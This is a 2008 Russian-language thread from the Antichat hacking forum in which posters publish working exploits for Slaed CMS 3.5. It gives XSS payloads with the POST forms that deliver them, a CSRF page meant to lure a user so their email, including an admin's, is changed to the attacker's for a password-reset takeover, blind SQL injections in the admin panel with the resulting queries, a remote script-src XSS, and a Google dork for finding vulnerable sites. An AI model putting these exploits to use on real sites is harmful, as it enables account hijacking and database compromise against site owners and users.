ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

11.05.2008, 00:38
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме: 10605912
Репутация:
4693
|
|
Пассивная XSS в Slaed CMS v. 3.5:
POST-запрос:
Код:
subject=%3Cimage+src%3Duploads%2Favatars%2F00.gif+onload%3Dalert%28%2Flala%2F%29%3E&hometext=1
Ну или создать:
Код:
<form method="POST" action="http://site/index.php?name=FAQ&op=add">
subject: <input type="text" name="subject"/><br />
hometext: <input type="text" name="hometext" value="1"/><br />
<input type="submit" />
</form>
и в поле subject прописать:
Код:
<image src=uploads/avatars/00.gif onload=alert(/lala/)>
В src должен быть указан путь к реально существующей картинке, параметр hometext должен быть установлен, значение может быть любым. Работает, если у пользователя есть права на добавление, даже при включеной предмодерации.
Моё, кажется нигде не было.
З.Ы.
Предложение модераторам: Может топик переименовать в просто Slaed CMS, без номера версии?
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
Последний раз редактировалось Qwazar; 11.05.2008 в 00:42..
|
|
|

11.05.2008, 01:53
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме: 10605912
Репутация:
4693
|
|
Ещё пассивная XSS в Slaed CMS v. 3.5:
Код:
<form method="POST" action="http://site/index.php?name=Account">
url: <input type="text" name="url"/><br />
<input type="submit" />
</form>
В поле url прописать:
Код:
"><image src=uploads/avatars/00.gif onload=alert(/XSS/)>
Как и в прошлом случае, src должно указывать на существующий файл.
З.Ы.
Примечательно, что в гет-запросах движок символ " не пропускает, а в пост- нормально
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
Последний раз редактировалось Qwazar; 11.05.2008 в 02:00..
|
|
|

11.05.2008, 03:32
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме: 10605912
Репутация:
4693
|
|
CSRF в Slaed CMS 3.5 :
На свой сервер положить страничку со следующим содержимым, и заманить туда юзера:
Код:
<body onload="p.submit()">
<form method="POST" action="http://site/index.php?name=Account&op=savehome" id="p">
<input type="hidden" name="user_email" value="ВАШЕ_МЫЛО"/><br />
</form>
Таким образом у пользователя сменится e-mail на ваш, (даже у админа), затем, на него можно запросить изменение пароля по этой ссылке: http://site/index.php?name=Account&op=passlost
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|

11.05.2008, 16:13
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме: 10605912
Репутация:
4693
|
|
Ещё пассивки в POST-запросах в Slaed CMS 3.5:
Код:
<form method="POST" action="http://site/index.php?name=News&op=add">
postname: <input type="text" name="postname"/><br />
<input type="submit" />
</form>
В поле url прописать:
Код:
"><image src=uploads/avatars/00.gif onload=alert(/XSS/)>
Поле src должно указывать на существующий файл. (Варианты с просто <script> и <body onload=""> не прокатят )
Так-же уязвимо поле Subject.
--------------------------------------
Тут:
Код:
http://site/index.php?name=Info
уязвимо поле url. Также POST запрос:
Код:
"><image src=uploads/avatars/00.gif onload=alert(/XSS/)>
---------------------------------------
Код:
http://site/index.php?name=Files&op=add
уязвимы поля: author, authormail, authorurl, title, cid
-------------------------------------
Код:
http://site/index.php?name=Auto_Links&op=add
уязвимы поля: a_sitelink, a_sitename, a_adminemail
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
Последний раз редактировалось Qwazar; 11.05.2008 в 18:48..
|
|
|

11.05.2008, 16:50
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме: 10605912
Репутация:
4693
|
|
Blind SQL-Injection в админке Slaed CMS 3.5:
Код:
<form method="POST" action="http://site/admin.php?op=news_save">
sid: <input type="text" name="sid"/><br />
subject: <input type="text" name="subject" value="subject"/><br />
hometext: <input type="text" name="hometext" value="SQL1"/><br />
postname: <input type="text" name="postname" value="postname"/><br />
bodytext: <input type="text" name="bodytext" value="SQL2"/><br />
posttype: <input type="text" name="posttype" value="save"/><br />
<input type="submit" />
</form>
Уязвимы поля hometext и bodytext. Если установлено поле sid, то запрос выглядит так:
Код:
UPDATE TKR_stories SET catid='', aid='postname', title='subject', time='2008-5-11 16:45:00', hometext='SQL1', bodytext='SQL2', field='', ihome='', acomm='', associated='', status='1' WHERE sid='1'
Если поле sid не установлено, то так:
Код:
INSERT INTO TKR_stories VALUES (NULL, '', 'postname', 'subject', '2008-5-11 16:47:00', 'SQL1', 'SQL2', '', '0', '0', '', '', '0', '0', '', '1')
Остальные поля должны быть установлены, у поля posttype должно быть значение save.
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|

11.05.2008, 19:19
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме: 10605912
Репутация:
4693
|
|
Ещё одна Blind SQL-Injection в админке Slaed CMS 3.5:
Код:
<form method="POST" action="http://site/admin.php?name=Auto_Links&op=auto_links_save">
a_id: <input type="text" name="a_id"/><br />
a_description: <input type="text" name="a_description" value="SQL"/><br />
a_sitename: <input type="text" name="a_sitename" value="1"/><br />
posttype: <input type="text" name="posttype" value="save"/><br />
<input type="submit" />
</form>
Если установлено поле a_id, то запрос выглядит так:
Код:
UPDATE TKR_auto_links SET sitename='1', description='SQL', link='', mail='', hits='0', outs='0' WHERE id='1'
если нет, то так:
Код:
INSERT INTO TKR_auto_links VALUES (NULL, '1', 'SQL', '', '', '0', '0', now())
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|

11.05.2008, 23:23
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме: 10605912
Репутация:
4693
|
|
Ещё пассивки в POST-запросах в Slaed CMS 3.5:
Код:
http://test6.ru/index.php?name=Pages&op=add
Уязвимы postname, subject
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|

09.06.2008, 14:15
|
|
Новичок
Регистрация: 01.12.2007
Сообщений: 3
Провел на форуме: 23389
Репутация:
0
|
|
SLAED.net на хрен взломан. Сейчас - недостпен.
http://antislaedcms.ru/index.php?showtopic=2513
http://forum.slaedsuck.com/
|
|
|

03.08.2008, 22:18
|
|
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме: 5149122
Репутация:
2438
|
|
Xss в SLAED CMS 3.5
Post-запрос на странице http://site/index.php?name=Account &op=new_user
Код:
"><script src=http://site/script.js>
в полях- gfx_check та random_num
|
|
|

04.09.2008, 21:08
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме: 14023893
Репутация:
2163
|
|
sql-inj в модуле анекдотов Jokes (дефолтный в слаед 3.3+ )
параметр cat:
/index.php?name=Jokes&op=CatView&cat={sql}
dork:
inurl:index.php?name=Jokes+inurl:cat=
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|